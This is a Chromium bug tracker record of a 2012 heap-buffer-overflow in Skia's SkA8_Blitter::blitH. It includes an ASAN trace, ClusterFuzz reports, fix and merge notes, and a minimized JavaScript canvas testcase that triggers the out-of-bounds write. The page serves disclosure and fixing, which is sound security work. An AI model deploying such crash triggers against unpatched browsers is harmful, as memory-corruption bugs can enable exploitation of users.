New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Dec 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security



Sign in to add a comment

Heap-buffer-overflow in SkA8_Blitter::blitH

Reported by attek...@gmail.com, Aug 6 2012

Issue description

Repro-file as attachment.

ASAN Chromium 22.0.1228.0 

ASAN-report:
==2861== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f553684113a at pc 0x7f554e128838 bp 0x7ffff1766c40 sp 0x7ffff1766c38
WRITE of size 1 at 0x7f553684113a thread T0
    #0 0x7f554e128837 in SkA8_Blitter::blitH(int, int, int) ???:0
    #1 0x7f554dfec235 in sk_fill_path(SkPath const&, SkIRect const*, SkBlitter*, int, int, int, SkRegion const&) ???:0
    #2 0x7f554dfee45e in SkScan::FillPath(SkPath const&, SkRegion const&, SkBlitter*) ???:0
    #3 0x7f554dfe1a9a in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool) ???:0
    #4 0x7f554dfe2af7 in SkScan::AntiFillPath(SkPath const&, SkRasterClip const&, SkBlitter*) ???:0
    #5 0x7f554df6becc in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const ???:0
    #6 0x7f554dfdc43c in SkScalerContext::getImage(SkGlyph const&) ???:0
    #7 0x7f554df7ef88 in SkGlyphCache::findImage(SkGlyph const&) ???:0
.
.
.
 
chrome-heap-buffer-overflow-SkA8BlitterblitH-afb.html
533 bytes View Download
Cc: epoger@chromium.org
Owner: reed@chromium.org
Status: Assigned
Mike, you just fixed a similar bug in this code area. looks like we missed some place ?
Cc: tomhud...@chromium.org
Labels: -Pri-0 -Area-Undefined Pri-1 Area-Internals Internals-Skia SecSeverity-Medium OS-All Stability-AddressSanitizer SecImpacts-Stable SecImpacts-Beta
looks similar to http://code.google.com/p/chromium/issues/detail?id=138238. clusterfuzz report coming https://cluster-fuzz.appspot.com/testcase?key=90585092

Comment 4 by reed@chromium.org, Aug 6 2012

II see an assert in the debug build, where I have overflowing a coefficient .6 -> .16. Am pondering a solution.
Summary: Heap-buffer-overflow in SkA8_Blitter::blitH
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=90585092

Uploader: inferno@chromium.org

Crash Type: Heap-buffer-overflow WRITE 1
Crash Address: 0x7f9ae016aa49
Crash State:
  - crash stack -
  SkA8_Blitter::blitH
  sk_fill_path
  SkScan::FillPath
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=116541:116563

Minimized Testcase (0.37 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv96WrRSrQgpRHwh7wExW9-jxQ8cccZH3IIA--_Lb8tpNw9_4gEO_QOl4TSwXyOO0CZ5ZYIVzthPrtCvvZkTo0SZJbxDCbEVkWscnzdEg4QO8arMYwkx00AQ3zF2LA50WyypWryUFBhlzczZA0c05Lh3nGCChsAPlJ7Ihbfb31M93iVen1Ck
</body>
<script>var canvas=document.body.appendChild(document.createElement("canvas"));
var ctx=canvas.getContext("2d")
try{ctx.lineWidth="700";}catch(e){}
try{ctx.font="italic normal 300 larger/196 Courier New";}catch(e){}
try{ctx.setTransform(0.1,1,-0.7,5,4,6);}catch(e){}
try{ctx.transform(1,6,-0.9,0.7,1,4);}catch(e){}
try{ctx.strokeText("���", 1,1,1);}catch(e){};


</script>
Labels: -SecSeverity-Medium SecSeverity-High
sorry this is sec-high.

Comment 7 by reed@chromium.org, Aug 6 2012

fixed in skia rev. 4960
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
Project Member

Comment 9 by ClusterFuzz, Aug 7 2012

ClusterFuzz has detected this issue as fixed in range 150333:150342.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=90585092

Uploader: inferno@chromium.org

Crash Type: Heap-buffer-overflow WRITE 1
Crash Address: 0x7f9ae016aa49
Crash State:
  - crash stack -
  SkA8_Blitter::blitH
  sk_fill_path
  SkScan::FillPath
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=116541:116563
Fixed: https://cluster-fuzz.appspot.com/revisions?range=150333:150342

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv96WrRSrQgpRHwh7wExW9-jxQ8cccZH3IIA--_Lb8tpNw9_4gEO_QOl4TSwXyOO0CZ5ZYIVzthPrtCvvZkTo0SZJbxDCbEVkWscnzdEg4QO8arMYwkx00AQ3zF2LA50WyypWryUFBhlzczZA0c05Lh3nGCChsAPlJ7Ihbfb31M93iVen1Ck

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.

Comment 10 by k...@google.com, Aug 8 2012

Labels: Mstone-22
Labels: -Mstone-22 Mstone-21
Labels: reward-topanel
Cc: epoger@google.com

Comment 14 by epoger@google.com, Sep 12 2012

Fix merged into Skia's chrome/m22_1229 branch as https://code.google.com/p/skia/source/detail?r=5510

Do we still need to merge this into M21 also?
Labels: -Merge-Approved -Mstone-21 Merge-Merged Mstone-22
no, we don't need it for m21.
Labels: -reward-topanel reward-1000 reward-unpaid
OOB write. $1000. Thx.
Labels: -reward-unpaid

Comment 18 by cdn@chromium.org, Nov 26 2012

Cc: ukbe...@gmail.com
CCing David Belcher from RIM so that they can assess whether they are affected.
Status: Fixed
Project Member

Comment 20 by bugdroid1@chromium.org, Mar 10 2013

Labels: -Type-Security -Area-Internals -Internals-Skia -SecSeverity-High -Stability-AddressSanitizer -SecImpacts-Stable -SecImpacts-Beta -Mstone-22 Cr-Internals-Skia Security-Impact-Beta M-22 Cr-Internals Security-Severity-High Security-Impact-Stable Type-Bug-Security Performance-Memory-AddressSanitizer
Labels: -Restrict-View-SecurityNotify
Project Member

Comment 22 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High
Project Member

Comment 23 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member

Comment 24 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member

Comment 25 by bugdroid1@chromium.org, Apr 1 2013

Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member

Comment 26 by sheriffbot@chromium.org, Jun 14 2016

Labels: -security_impact-beta
Project Member

Comment 27 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 28 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic

Sign in to add a comment